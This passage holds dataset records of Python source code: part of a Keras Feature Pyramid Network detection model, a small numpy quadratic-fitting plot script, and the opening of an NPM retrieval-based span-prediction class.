Generated by\r\n # subsampling from P5 with stride of 2.\r\n P6 = MaxPooling2D(pool_size=(1, 1), strides=2, name=\"fpn_p6\")(P5)\r\n\r\n # Note that P6 is used in RPN, but not in the classifier heads.\r\n rpn_feature_maps = [P2, P3, P4, P5, P6]\r\n feat_pyr_net_feature_maps = [P2, P3, P4, P5]\r\n\r\n # Anchors\r\n if mode == \"training\":\r\n anchors = self.get_anchors(config.IMAGE_SHAPE)\r\n # Duplicate across the batch dimension because Keras requires it\r\n anchors = np.broadcast_to(anchors, (config.BATCH_SIZE,) + anchors.shape)\r\n # A hack to get around Keras's bad support for constants\r\n anchors = Lambda(lambda x: tf.Variable(anchors), name=\"anchors\")(input_image)\r\n else:\r\n anchors = input_anchors\r\n\r\n # RPN Model\r\n rpn = RegionProposalNetwork.build_rpn_model(config.RPN_ANCHOR_STRIDE,\r\n len(config.RPN_ANCHOR_RATIOS), config.TOP_DOWN_PYRAMID_SIZE)\r\n # Loop through pyramid layers\r\n layer_outputs = [] # list of lists\r\n for p in rpn_feature_maps:\r\n layer_outputs.append(rpn([p]))\r\n # Concatenate layer outputs\r\n # Convert from list of lists of level outputs to list of lists\r\n # of outputs across levels.\r\n # e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]\r\n output_names = [\"rpn_class_logits\", \"rpn_class\", \"rpn_bbox\"]\r\n outputs = list(zip(*layer_outputs))\r\n outputs = [Concatenate(axis=1, name=n)(list(o))\r\n for o, n in zip(outputs, output_names)]\r\n\r\n rpn_class_logits, rpn_class, rpn_bbox = outputs\r\n\r\n # Generate proposals\r\n # Proposals are [batch, N, (y1, x1, y2, x2)] in normalized coordinates\r\n # and zero padded.\r\n proposal_count = config.POST_NMS_ROIS_TRAINING if mode == \"training\" \\\r\n else config.POST_NMS_ROIS_INFERENCE\r\n rpn_rois = ProposalLayer(\r\n proposal_count=proposal_count,\r\n nms_threshold=config.RPN_NMS_THRESHOLD,\r\n name=\"ROI\",\r\n config=config)([rpn_class, rpn_bbox, anchors])\r\n\r\n if mode == \"training\":\r\n # Class ID mask to mark class IDs supported by the dataset the image\r\n # came from.\r\n active_class_ids = Lambda(\r\n lambda x: model_utils.parse_image_meta_graph(x)[\"active_class_ids\"]\r\n )(input_image_meta)\r\n\r\n if not config.USE_RPN_ROIS:\r\n # Ignore predicted ROIs and use ROIs provided as an input.\r\n input_rois = Input(shape=[config.POST_NMS_ROIS_TRAINING, 4],\r\n name=\"input_roi\", dtype=np.int32)\r\n # Normalize coordinates\r\n target_rois = Lambda(lambda x: model_utils.norm_boxes_graph(\r\n x, K.shape(input_image)[1:3]))(input_rois)\r\n else:\r\n target_rois = rpn_rois\r\n\r\n # Generate detection targets\r\n # Subsamples proposals and generates target outputs for training\r\n # Note that proposal class IDs, gt_boxes, and gt_masks are zero\r\n # padded. 
Equally, returned rois and targets are zero padded.\r\n rois, target_class_ids, target_bbox = \\\r\n DetectionTargetLayer(config, name=\"proposal_targets\")([\r\n target_rois, input_gt_class_ids, gt_boxes])\r\n\r\n # Network Heads\r\n # TODO: verify that this handles zero padded ROIs\r\n feat_pyr_net_class_logits, feat_pyr_net_class, feat_pyr_net_bbox = \\\r\n FeaturePyramidNetwork.fpn_classifier_graph(rois, feat_pyr_net_feature_maps, input_image_meta,\r\n config.POOL_SIZE, config.NUM_CLASSES,\r\n train_bn=config.TRAIN_BN,\r\n fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)\r\n\r\n # TODO: clean up (use tf.identify if necessary)\r\n output_rois = Lambda(lambda x: x * 1, name=\"output_rois\")(rois)\r\n\r\n # Losses\r\n rpn_class_loss = Lambda(lambda x: Loss_Functions.rpn_class_loss_graph(*x), name=\"rpn_class_loss\")(\r\n [input_rpn_match, rpn_class_logits])\r\n rpn_bbox_loss = Lambda(lambda x: Loss_Functions.rpn_bbox_loss_graph(config, *x), name=\"rpn_bbox_loss\")(\r\n [input_rpn_bbox, input_rpn_match, rpn_bbox])\r\n class_loss = Lambda(lambda x: Loss_Functions.feat_pyr_net_class_loss_graph(*x),\r\n name=\"feat_pyr_net_class_loss\")(\r\n [target_class_ids, feat_pyr_net_class_logits, active_class_ids])\r\n bbox_loss = Lambda(lambda x: Loss_Functions.feat_pyr_net_bbox_loss_graph(*x),\r\n name=\"feat_pyr_net_bbox_loss\")(\r\n [target_bbox, target_class_ids, feat_pyr_net_bbox])\r\n\r\n # Model\r\n inputs = [input_image, input_image_meta,\r\n input_rpn_match, input_rpn_bbox, input_gt_class_ids, input_gt_boxes]\r\n if not config.USE_RPN_ROIS:\r\n inputs.append(input_rois)\r\n outputs = [rpn_class_logits, rpn_class, rpn_bbox,\r\n feat_pyr_net_class_logits, feat_pyr_net_class, feat_pyr_net_bbox,\r\n rpn_rois, output_rois,\r\n rpn_class_loss, rpn_bbox_loss, class_loss, bbox_loss]\r\n model = Model(inputs, outputs, name='fpn_model')\r\n else:\r\n\r\n # Network Heads\r\n # Proposal classifier and BBox regressor heads\r\n feat_pyr_net_class_logits, feat_pyr_net_class, feat_pyr_net_bbox = \\\r\n FeaturePyramidNetwork.fpn_classifier_graph(rpn_rois, feat_pyr_net_feature_maps, input_image_meta,\r\n config.POOL_SIZE, config.NUM_CLASSES,\r\n train_bn=config.TRAIN_BN,\r\n fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)\r\n\r\n # Detections\r\n # output is [batch, num_detections, (y1, x1, y2, x2, class_id, score)] in\r\n # normalized coordinates\r\n detections = DetectionLayer(config, name=\"feat_pyr_net_detection\")(\r\n [rpn_rois, feat_pyr_net_class, feat_pyr_net_bbox, input_image_meta])\r\n\r\n model = Model([input_image, input_image_meta, input_anchors],\r\n [detections, feat_pyr_net_class, feat_pyr_net_bbox,\r\n rpn_rois, rpn_class, rpn_bbox, P2, P3, P4, P5],\r\n name='fpn_model')\r\n\r\n # # Add multi-GPU support.\r\n # if config.GPU_COUNT > 1:\r\n # from fpn.parallel_model import ParallelModel\r\n # model = ParallelModel(model, config.GPU_COUNT)\r\n\r\n return model\r\n\r\n def get_anchors(self, image_shape):\r\n \"\"\"Returns anchor pyramid for the given image size.\"\"\"\r\n backbone_shapes = model_utils.compute_backbone_shapes(self.config, image_shape)\r\n # Cache anchors and reuse if image shape is the same\r\n if not hasattr(self, \"_anchor_cache\"):\r\n self._anchor_cache = {}\r\n if not tuple(image_shape) in self._anchor_cache:\r\n # Generate Anchors\r\n a = utils.generate_pyramid_anchors(\r\n self.config.RPN_ANCHOR_SCALES,\r\n self.config.RPN_ANCHOR_RATIOS,\r\n backbone_shapes,\r\n self.config.BACKBONE_STRIDES,\r\n self.config.RPN_ANCHOR_STRIDE)\r\n # Keep a copy of the latest anchors in 
pixel coordinates because\r\n            # it's used in inspect_model notebooks.\r\n            # TODO: Remove this after the notebooks are refactored to not use it\r\n            self.anchors = a\r\n            # Normalize coordinates\r\n            self._anchor_cache[tuple(image_shape)] = utils.norm_boxes(a, image_shape[:2])\r\n        return self._anchor_cache[tuple(image_shape)]\r\n\r\n    def set_log_dir(self, model_path=None):\r\n        \"\"\"Sets the model log directory and epoch counter.\r\n\r\n        model_path: If None, or a format different from what this code uses\r\n            then set a new log directory and start epochs from 0. Otherwise,\r\n            extract the log directory and the epoch counter from the file\r\n            name.\r\n        \"\"\"\r\n        # Set date and epoch counter as if starting a new model\r\n        self.epoch = 0\r\n        now = datetime.datetime.now()\r\n\r\n        # TODO: Update for FPN Train Continue\r\n        # If we have a model path with date and epochs use them\r\n        if model_path:\r\n            # Continue from where we left off. Get epoch and date from the file name\r\n            # A sample model path might look like:\r\n            # /path/to/logs/coco20171029T2315/mask_rcnn_coco_0001.h5\r\n            regex = r\".*/[\\w-]+(\\d{4})(\\d{2})(\\d{2})T(\\d{2})(\\d{2})/fpn\\_[\\w-]+(\\d{4})\\.h5\"\r\n            m = re.match(regex, model_path)\r\n            if m:\r\n                now = datetime.datetime(int(m.group(1)), int(m.group(2)), int(m.group(3)),\r\n                                        int(m.group(4)), int(m.group(5)))\r\n                # Epoch number in file is 1-based, and in Keras code it's 0-based.\r\n                # So, adjust for that then increment by one to start from the next epoch\r\n                self.epoch = int(m.group(6)) - 1 + 1\r\n                print('Re-starting from epoch %d' % self.epoch)\r\n\r\n        # Directory for training logs\r\n        self.log_dir = os.path.join(self.model_dir, \"{}{:%Y%m%dT%H%M}\".format(\r\n            self.config.NAME.lower(), now))\r\n\r\n        # Create log_dir if not exists\r\n        if not os.path.exists(self.log_dir):\r\n            os.makedirs(self.log_dir)\r\n\r\n        # Path to save after each epoch. Include placeholders that get filled by Keras.\r\n        self.checkpoint_path = os.path.join(self.log_dir, \"fpn_{}_*epoch*.h5\".format(\r\n            self.config.NAME.lower()))\r\n        self.checkpoint_path = self.checkpoint_path.replace(\"*epoch*\", \"{epoch:04d}\")\r\n\r\n    def train(self, train_dataset, val_dataset, learning_rate, epochs, layers,\r\n              augmentation=None, custom_callbacks=None):\r\n        \"\"\"Train the model.\r\n        train_dataset, val_dataset: Training and validation Dataset objects.\r\n        learning_rate: The learning rate to train with\r\n        epochs: Number of training epochs. Note that previous training epochs\r\n            are considered to be done already, so this actually determines\r\n            the epochs to train in total rather than in this particular\r\n            call.\r\n        layers: Allows selecting which layers to train. It can be:\r\n            - A regular expression to match layer names to train\r\n            - One of these predefined values:\r\n              heads: The RPN, classifier and mask heads of the network\r\n              all: All the layers\r\n              3+: Train Resnet stage 3 and up\r\n              4+: Train Resnet stage 4 and up\r\n              5+: Train Resnet stage 5 and up\r\n        augmentation: Optional. An imgaug (https://github.com/aleju/imgaug)\r\n            augmentation. For example, passing imgaug.augmenters.Fliplr(0.5)\r\n            flips images right/left 50% of the time. You can pass complex\r\n            augmentations as well. 
This augmentation applies 50% of the\r\n time, and when it does it flips images right/left half the time\r\n and adds a Gaussian blur with a random sigma in range 0 to 5.\r\n\r\n augmentation = imgaug.augmenters.Sometimes(0.5, [\r\n imgaug.augmenters.Fliplr(0.5),\r\n imgaug.augmenters.GaussianBlur(sigma=(0.0, 5.0))\r\n ])\r\n custom_callbacks: Optional. Add custom callbacks to be called\r\n with the keras fit_generator method. Must be list of type keras.callbacks.\r\n no_augmentation_sources: Optional. List of sources to exclude for\r\n augmentation. A source is string that identifies a dataset and is\r\n defined in the Dataset class.\r\n \"\"\"\r\n assert self.mode == \"training\", \"Create model in training mode.\"\r\n\r\n # Pre-defined layer regular expressions\r\n layer_regex = {\r\n # all layers but the backbone\r\n \"heads\": r\"(feat_pyr_net\\_.*)|(rpn\\_.*)|(fpn\\_.*)\",\r\n # From a specific Resnet stage and up\r\n \"3+\": r\"(res3.*)|(bn3.*)|(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(feat_pyr_net\\_.*)|(rpn\\_.*)|(fpn\\_.*)\",\r\n \"4+\": r\"(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(feat_pyr_net\\_.*)|(rpn\\_.*)|(fpn\\_.*)\",\r\n \"5+\": r\"(res5.*)|(bn5.*)|(feat_pyr_net\\_.*)|(rpn\\_.*)|(fpn\\_.*)\",\r\n # All layers\r\n \"all\": \".*\",\r\n }\r\n if layers in layer_regex.keys():\r\n layers = layer_regex[layers]\r\n\r\n print(\"\\n\\nBATCH_SIZE: \", self.config.BATCH_SIZE)\r\n\r\n # Data generators\r\n train_generator = DataGenerator.data_generator(train_dataset, self.config, shuffle=True,\r\n augmentation=augmentation,\r\n batch_size=self.config.BATCH_SIZE)\r\n val_generator = DataGenerator.data_generator(val_dataset, self.config, shuffle=True,\r\n batch_size=self.config.BATCH_SIZE)\r\n\r\n logs_path = self.log_dir + \"/training.log\"\r\n\r\n # Callbacks\r\n callbacks = [\r\n keras.callbacks.TensorBoard(log_dir=self.log_dir,\r\n histogram_freq=0, write_graph=True, write_images=False),\r\n keras.callbacks.ModelCheckpoint(self.checkpoint_path,\r\n verbose=1, save_weights_only=True),\r\n keras.callbacks.CSVLogger(logs_path, separator=\",\", append=True),\r\n ]\r\n\r\n # Add custom callbacks to the list\r\n if custom_callbacks:\r\n callbacks += custom_callbacks\r\n\r\n # Train\r\n log(\"\\nStarting at epoch {}. LR={}\\n\".format(self.epoch, learning_rate))\r\n log(\"Checkpoint Path: {}\".format(self.checkpoint_path))\r\n self.set_trainable(layers)\r\n self.compile(learning_rate, self.config.LEARNING_MOMENTUM)\r\n\r\n # Work-around for Windows: Keras fails on Windows when using\r\n # multiprocessing workers. 
See discussion here:\r\n        # https://github.com/matterport/Mask_RCNN/issues/13#issuecomment-353124009\r\n        if os.name == 'nt':\r\n            workers = 0\r\n        else:\r\n            workers = multiprocessing.cpu_count()\r\n\r\n        self.keras_model.fit_generator(\r\n            train_generator,\r\n            initial_epoch=self.epoch,\r\n            epochs=epochs,\r\n            steps_per_epoch=self.config.STEPS_PER_EPOCH,\r\n            callbacks=callbacks,\r\n            validation_data=val_generator,\r\n            validation_steps=self.config.VALIDATION_STEPS,\r\n            max_queue_size=100,\r\n            workers=workers,\r\n            use_multiprocessing=True,\r\n        )\r\n        self.epoch = max(self.epoch, epochs)\r\n\r\n    def set_trainable(self, layer_regex, keras_model=None, indent=0, verbose=1):\r\n        \"\"\"Sets model layers as trainable if their names match\r\n        the given regular expression.\r\n        \"\"\"\r\n        # Print message on the first call (but not on recursive calls)\r\n        if verbose > 0 and keras_model is None:\r\n            log(\"Selecting layers to train\")\r\n\r\n        keras_model = keras_model or self.keras_model\r\n\r\n        # In multi-GPU training, we wrap the model. Get layers\r\n        # of the inner model because they have the weights.\r\n        layers = keras_model.inner_model.layers if hasattr(keras_model, \"inner_model\") \\\r\n            else keras_model.layers\r\n\r\n        for layer in layers:\r\n            # Is the layer a model?\r\n            if layer.__class__.__name__ == 'Model':\r\n                print(\"In model: \", layer.name)\r\n                self.set_trainable(\r\n                    layer_regex, keras_model=layer, indent=indent + 4)\r\n                continue\r\n\r\n            if not layer.weights:\r\n                continue\r\n            # Is it trainable?\r\n            trainable = bool(re.fullmatch(layer_regex, layer.name))\r\n            # Update layer. If layer is a container, update inner layer.\r\n            if layer.__class__.__name__ == 'TimeDistributed':\r\n                layer.layer.trainable = trainable\r\n            else:\r\n                layer.trainable = trainable\r\n            # Print trainable layer names\r\n            if trainable and verbose > 0:\r\n                log(\"{}{:20}   ({})\".format(\" \" * indent, layer.name,\r\n                                            layer.__class__.__name__))\r\n\r\n    def compile(self, learning_rate, momentum):\r\n        \"\"\"Gets the model ready for training. Adds losses, regularization, and\r\n        metrics. 
Then calls the Keras compile() function.\r\n \"\"\"\r\n # Optimizer object\r\n optimizer = keras.optimizers.SGD(\r\n lr=learning_rate, momentum=momentum,\r\n clipnorm=self.config.GRADIENT_CLIP_NORM)\r\n\r\n # optimizer = keras.optimizers.Adam(lr=learning_rate)\r\n\r\n # Add Losses\r\n # First, clear previously set losses to avoid duplication\r\n self.keras_model._losses = []\r\n self.keras_model._per_input_losses = {}\r\n loss_names = [\r\n \"rpn_class_loss\", \"rpn_bbox_loss\",\r\n \"feat_pyr_net_class_loss\", \"feat_pyr_net_bbox_loss\"]\r\n for name in loss_names:\r\n layer = self.keras_model.get_layer(name)\r\n if layer.output in self.keras_model.losses:\r\n continue\r\n loss = (\r\n tf.reduce_mean(layer.output, keepdims=True)\r\n * self.config.LOSS_WEIGHTS.get(name, 1.))\r\n self.keras_model.add_loss(loss)\r\n\r\n # Add L2 Regularization\r\n # Skip gamma and beta weights of batch normalization layers.\r\n reg_losses = [\r\n keras.regularizers.l2(self.config.WEIGHT_DECAY)(w) / tf.cast(tf.size(w), tf.float32)\r\n for w in self.keras_model.trainable_weights\r\n if 'gamma' not in w.name and 'beta' not in w.name]\r\n self.keras_model.add_loss(tf.add_n(reg_losses))\r\n\r\n # Compile\r\n self.keras_model.compile(\r\n optimizer=optimizer,\r\n loss=[None] * len(self.keras_model.outputs))\r\n\r\n # Add metrics for losses\r\n for name in loss_names:\r\n if name in self.keras_model.metrics_names:\r\n continue\r\n layer = self.keras_model.get_layer(name)\r\n self.keras_model.metrics_names.append(name)\r\n loss = (\r\n tf.reduce_mean(layer.output, keepdims=True)\r\n * self.config.LOSS_WEIGHTS.get(name, 1.))\r\n self.keras_model.metrics_tensors.append(loss)\r\n\r\n def load_weights(self, filepath, by_name=False, exclude=None):\r\n \"\"\"Modified version of the corresponding Keras function with\r\n the addition of multi-GPU support and the ability to exclude\r\n some layers from loading.\r\n exclude: list of layer names to exclude\r\n \"\"\"\r\n import h5py\r\n # Conditional import to support versions of Keras before 2.2\r\n # TODO: remove in about 6 months (end of 2018)\r\n try:\r\n from keras.engine import saving\r\n except ImportError:\r\n # Keras before 2.2 used the 'topology' namespace.\r\n from keras.engine import topology as saving\r\n\r\n if exclude:\r\n by_name = True\r\n\r\n if h5py is None:\r\n raise ImportError('`load_weights` requires h5py.')\r\n f = h5py.File(filepath, mode='r')\r\n if 'layer_names' not in f.attrs and 'model_weights' in f:\r\n f = f['model_weights']\r\n\r\n # In multi-GPU training, we wrap the model. Get layers\r\n # of the inner model because they have the weights.\r\n keras_model = self.keras_model\r\n layers = keras_model.inner_model.layers if hasattr(keras_model, \"inner_model\") \\\r\n else keras_model.layers\r\n\r\n # Exclude some layers\r\n if exclude:\r\n layers = filter(lambda l: l.name not in exclude, layers)\r\n\r\n if by_name:\r\n saving.load_weights_from_hdf5_group_by_name(f, layers)\r\n else:\r\n saving.load_weights_from_hdf5_group(f, layers)\r\n if hasattr(f, 'close'):\r\n f.close()\r\n\r\n # Update the log directory\r\n self.set_log_dir(filepath)\r\n\r\n def detect(self, images, verbose=0):\r\n \"\"\"Runs the detection pipeline.\r\n images: List of images, potentially of different sizes.\r\n\r\n Returns a list of dicts, one dict per image. 
The dict contains:\r\n rois: [N, (y1, x1, y2, x2)] detection bounding boxes\r\n class_ids: [N] int class IDs\r\n scores: [N] float probability scores for the class IDs\r\n \"\"\"\r\n assert self.mode == \"inference\", \"Create model in inference mode.\"\r\n assert len(images) == self.config.BATCH_SIZE, \"len(images) must be equal to BATCH_SIZE\"\r\n\r\n if verbose:\r\n log(\"Processing {} images\".format(len(images)))\r\n for image in images:\r\n log(\"image\", image)\r\n\r\n # Mold inputs to format expected by the neural network\r\n molded_images, image_metas, windows = self.mold_inputs(images)\r\n\r\n # Validate image sizes\r\n # All images in a batch MUST be of the same size\r\n image_shape = molded_images[0].shape\r\n for g in molded_images[1:]:\r\n assert g.shape == image_shape, \\\r\n \"After resizing, all images must have the same size. Check IMAGE_RESIZE_MODE and image sizes.\"\r\n\r\n # Anchors\r\n anchors = self.get_anchors(image_shape)\r\n # Duplicate across the batch dimension because Keras requires it\r\n # TODO: can this be optimized to avoid duplicating the anchors?\r\n anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)\r\n\r\n if verbose:\r\n log(\"molded_images\", molded_images)\r\n log(\"image_metas\", image_metas)\r\n log(\"anchors\", anchors)\r\n # Run object detection\r\n detections, fpn_class, fpn_bbox, rpn_rois, rpn_class, rpn_bbox, P2, P3, P4, P5 = \\\r\n self.keras_model.predict([molded_images, image_metas, anchors], verbose=0)\r\n # Process detections\r\n results = []\r\n for i, image in enumerate(images):\r\n final_rois, final_class_ids, final_scores = \\\r\n self.unmold_detections(detections[i],\r\n image.shape, molded_images[i].shape,\r\n windows[i])\r\n final_P2 = P2[i]\r\n final_P3 = P3[i]\r\n final_P4 = P4[i]\r\n final_P5 = P5[i]\r\n results.append({\r\n \"rois\": final_rois,\r\n \"class_ids\": final_class_ids,\r\n \"scores\": final_scores,\r\n \"P2\": final_P2,\r\n \"P3\": final_P3,\r\n \"P4\": final_P4,\r\n \"P5\": final_P5,\r\n })\r\n # results.append({\r\n # \"detections\": detections[i],\r\n # \"fpn_class\": fpn_class[i],\r\n # \"fpn_bbox\": fpn_bbox[i],\r\n # \"rpn_rois\": rpn_rois[i],\r\n # \"rpn_class\": rpn_class[i],\r\n # \"rpn_bbox\": rpn_bbox[i],\r\n # })\r\n\r\n return results\r\n\r\n def mold_inputs(self, images):\r\n \"\"\"Takes a list of images and modifies them to the format expected\r\n as an input to the neural network.\r\n images: List of image matrices [height,width,depth]. Images can have\r\n different sizes.\r\n\r\n Returns 3 Numpy matrices:\r\n molded_images: [N, h, w, 3]. Images resized and normalized.\r\n image_metas: [N, length of meta data]. Details about each image.\r\n windows: [N, (y1, x1, y2, x2)]. 
The portion of the image that has the\r\n original image (padding excluded).\r\n \"\"\"\r\n molded_images = []\r\n image_metas = []\r\n windows = []\r\n for image in images:\r\n # Resize image\r\n # TODO: move resizing to mold_image()\r\n molded_image, window, scale, padding, crop = utils.resize_image(\r\n image,\r\n min_dim=self.config.IMAGE_MIN_DIM,\r\n min_scale=self.config.IMAGE_MIN_SCALE,\r\n max_dim=self.config.IMAGE_MAX_DIM,\r\n mode=self.config.IMAGE_RESIZE_MODE)\r\n molded_image = model_utils.mold_image(molded_image, self.config)\r\n # Build image_meta\r\n image_meta = model_utils.compose_image_meta(\r\n 0, image.shape, molded_image.shape, window, scale,\r\n np.zeros([self.config.NUM_CLASSES], dtype=np.int32))\r\n # Append\r\n molded_images.append(molded_image)\r\n windows.append(window)\r\n image_metas.append(image_meta)\r\n # Pack into arrays\r\n molded_images = np.stack(molded_images)\r\n image_metas = np.stack(image_metas)\r\n windows = np.stack(windows)\r\n return molded_images, image_metas, windows\r\n\r\n def unmold_detections(self, detections, original_image_shape, image_shape, window):\r\n \"\"\"Reformats the detections of one image from the format of the neural\r\n network output to a format suitable for use in the rest of the\r\n application.\r\n\r\n detections: [N, (y1, x1, y2, x2, class_id, score)] in normalized coordinates\r\n original_image_shape: [H, W, C] Original image shape before resizing\r\n image_shape: [H, W, C] Shape of the image after resizing and padding\r\n window: [y1, x1, y2, x2] Pixel coordinates of box in the image where the real\r\n image is excluding the padding.\r\n\r\n Returns:\r\n boxes: [N, (y1, x1, y2, x2)] Bounding boxes in pixels\r\n class_ids: [N] Integer class IDs for each bounding box\r\n scores: [N] Float probability scores of the class_id\r\n \"\"\"\r\n print(\"\\n\\ndetections: \", detections.shape)\r\n\r\n # How many detections do we have?\r\n # Detections array is padded with zeros. Find the first class_id == 0.\r\n zero_ix = np.where(detections[:, 4] == 0)[0]\r\n N = zero_ix[0] if zero_ix.shape[0] > 0 else detections.shape[0]\r\n\r\n print(\"\\n\\nN: \", N)\r\n\r\n # Extract boxes, class_ids, scores\r\n boxes = detections[:N, :4]\r\n class_ids = detections[:N, 4].astype(np.int32)\r\n scores = detections[:N, 5]\r\n\r\n # Translate normalized coordinates in the resized image to pixel\r\n # coordinates in the original image before resizing\r\n window = utils.norm_boxes(window, image_shape[:2])\r\n wy1, wx1, wy2, wx2 = window\r\n shift = np.array([wy1, wx1, wy1, wx1])\r\n wh = wy2 - wy1 # window height\r\n ww = wx2 - wx1 # window width\r\n scale = np.array([wh, ww, wh, ww])\r\n # Convert boxes to normalized coordinates on the window\r\n boxes = np.divide(boxes - shift, scale)\r\n # Convert boxes to pixel coordinates on the original image\r\n boxes = utils.denorm_boxes(boxes, original_image_shape[:2])\r\n\r\n # Filter out detections with zero area. 
Happens in early training when\r\n # network weights are still random\r\n exclude_ix = np.where(\r\n (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]\r\n if exclude_ix.shape[0] > 0:\r\n boxes = np.delete(boxes, exclude_ix, axis=0)\r\n class_ids = np.delete(class_ids, exclude_ix, axis=0)\r\n scores = np.delete(scores, exclude_ix, axis=0)\r\n # N = class_ids.shape[0]\r\n\r\n return boxes, class_ids, scores\r\n","repo_name":"SirisAvishek/Attention_Shift_Ranks","sub_path":"Attention_Shift_Saliency_Rank/fpn_network/FPN.py","file_name":"FPN.py","file_ext":"py","file_size_in_byte":32583,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"53"} +{"seq_id":"43423856315","text":"# encoding: utf-8\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nx_arr = np.array([0, 1, 2, 3])\r\ny_arr = np.array([2, 1, 1, 2])\r\n#\r\n# print(\"x_arr**4={}\".format((x_arr**4).sum()))\r\n# print(\"x_arr**3={}\".format((x_arr**3).sum()))\r\n# print(\"x_arr**2={}\".format((x_arr**2).sum()))\r\n# print(\"x_arr={}\".format(x_arr.sum()))\r\n# print(\"\\n\")\r\n# print(\"y_arr={}\".format(y_arr.sum()))\r\n# print(\"xy={}\".format((x_arr * y_arr).sum()))\r\n# print(\"x^2y={}\".format(((x_arr**2) * y_arr).sum()))\r\n\r\n\r\narr_a = [[196, 72, 28],\r\n [72, 28, 12],\r\n [14, 6, 4]]\r\nmatrix_b = np.array([[48], [18], [6]])\r\nmatrix_A = np.array(arr_a)\r\nmatrix_abc = np.linalg.inv(matrix_A).dot(matrix_b)\r\n\r\nprint(matrix_abc)\r\nmatrix_t = np.transpose(matrix_abc).round(2)\r\nprint(matrix_t)\r\n\r\nX = np.linspace(-0.5, 3.5, num=1000)\r\nY = matrix_t[0][0]*(X**2) + matrix_t[0][1]*X + matrix_t[0][2]\r\n\r\nplt.figure()\r\nplt.title(\"$f(x)=({})x^2+({})x+({})$\".format(matrix_t[0][0], matrix_t[0][1], matrix_t[0][2]))\r\nplt.scatter(x_arr, y_arr, c='r')\r\nplt.plot(X, Y)\r\nplt.show()\r\n","repo_name":"niko-liu/python_play","sub_path":"linear/approximate_line.py","file_name":"approximate_line.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2052264151","text":"import torch\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nimport json\nimport math\nimport time\nimport numpy as np\nimport os\nimport pickle as pkl\nimport datetime\nimport re\nimport string\n\nfrom collections import defaultdict, Counter\nfrom scipy.special import softmax, log_softmax\n\nfrom npm.npm_single import NPMSingle\nfrom task.utils_eval import normalize_answer\n\ntry:\n from termcolor import colored\nexcept:\n pass\nimport torch.nn.functional as F\n\nclass NPM(NPMSingle):\n def get_all_scores(self, queries):\n start_query, end_query = queries\n start_scores, start_indices, start_knn_ids = super().get_all_scores(start_query)\n end_scores, end_indices, end_knn_ids = super().get_all_scores(end_query)\n\n all_indices = np.concatenate([start_indices, end_indices], -1)\n knn_ids = [start_knn_ids[0] + end_knn_ids[0]]\n all_scores = np.concatenate([start_scores, end_scores], -1)\n all_scores /= self.temperature\n assert len(knn_ids)==len(all_scores)==1 and len(knn_ids[0])==len(all_scores[0])\n\n return all_scores, all_indices, knn_ids\n\n def predict_span(self, query_text, ngram_max, valid_func=None,\n alphas=[0.0], is_question=False, return_metadata=False):\n\n # first, obtain query emb\n inputs = self.model.tokenizer(query_text)\n input_ids = inputs[\"input_ids\"]\n assert self.model.tokenizer.mask_token_id in input_ids\n idx = 
input_ids.index(self.model.tokenizer.mask_token_id)\n with torch.no_grad():\n input_tensor = torch.LongTensor([input_ids]).cuda()\n _, (start_query_tensor, end_query_tensor) = self.model.forward(input_tensor, idx)\n start_query = start_query_tensor.detach().cpu().numpy()\n end_query = end_query_tensor.detach().cpu().numpy()\n\n pos2ngram = {}\n predictions = {}\n\n # this is a utility function that finds all possible spans\n # composed with the top k start indices and end indices\n def get_candidates(start_indices, end_indices):\n consider_string_boundary = self.dstore.consider_string_boundary\n\n start_triples = self.dstore._get_token_position(start_indices.tolist(),\n ngram_after=ngram_max)\n end_triples = self.dstore._get_token_position(end_indices.tolist(),\n ngram_before=ngram_max)\n\n all_start_indices = set()\n all_end_indices = set()\n all_start_and_end = set()\n\n for (block_idx, token_indices, vocabs), start_token_idx in zip(start_triples[0], start_indices[0]):\n\n if consider_string_boundary and token_indices[0] not in self.dstore.orig_block_idx_to_valid_start[block_idx]:\n continue\n all_start_indices.add(start_token_idx)\n end_token_idx = start_token_idx\n\n for j in range(len(token_indices)):\n\n is_valid_start = token_indices[j] in self.dstore.orig_block_idx_to_valid_start[block_idx]\n is_valid_end = token_indices[j] in self.dstore.orig_block_idx_to_valid_end[block_idx]\n\n if self.dstore.embs_consider_boundary and not (is_valid_start or is_valid_end):\n continue\n\n if (not consider_string_boundary) or is_valid_end:\n ngram = vocabs[:j+1]\n ngram_pos = (start_token_idx, end_token_idx)\n # ngram_pos = (block_idx, token_indices[0], token_indices[0]+j)\n # assert len(ngram)==ngram_pos[1][1]-ngram_pos[1][0]+1\n if valid_func is None or valid_func(ngram):\n if ngram_pos in pos2ngram:\n assert pos2ngram[ngram_pos]==ngram\n else:\n pos2ngram[ngram_pos] = ngram\n all_end_indices.add(end_token_idx)\n all_start_and_end.add(ngram_pos)\n\n end_token_idx += 1\n\n for (block_idx, token_indices, vocabs), end_token_idx in zip(end_triples[0], end_indices[0]):\n\n if consider_string_boundary and token_indices[-1] not in self.dstore.orig_block_idx_to_valid_end[block_idx]:\n continue\n all_end_indices.add(end_token_idx)\n start_token_idx = end_token_idx\n\n for j in range(len(token_indices)):\n\n is_valid_start = token_indices[-j-1] in self.dstore.orig_block_idx_to_valid_start[block_idx]\n is_valid_end = token_indices[-j-1] in self.dstore.orig_block_idx_to_valid_end[block_idx]\n\n if self.dstore.embs_consider_boundary and not (is_valid_start or is_valid_end):\n continue\n\n if (not consider_string_boundary) or is_valid_start:\n ngram = vocabs[-j-1:]\n ngram_pos = (start_token_idx, end_token_idx)\n # ngram_pos = (block_idx, token_indices[-1]-j, token_indices[-1])\n # assert len(ngram)==ngram_pos[1][1]-ngram_pos[1][0]+1\n if valid_func is None or valid_func(ngram):\n if ngram_pos in pos2ngram:\n assert pos2ngram[ngram_pos]==ngram\n else:\n pos2ngram[ngram_pos] = ngram\n all_start_indices.add(start_token_idx)\n 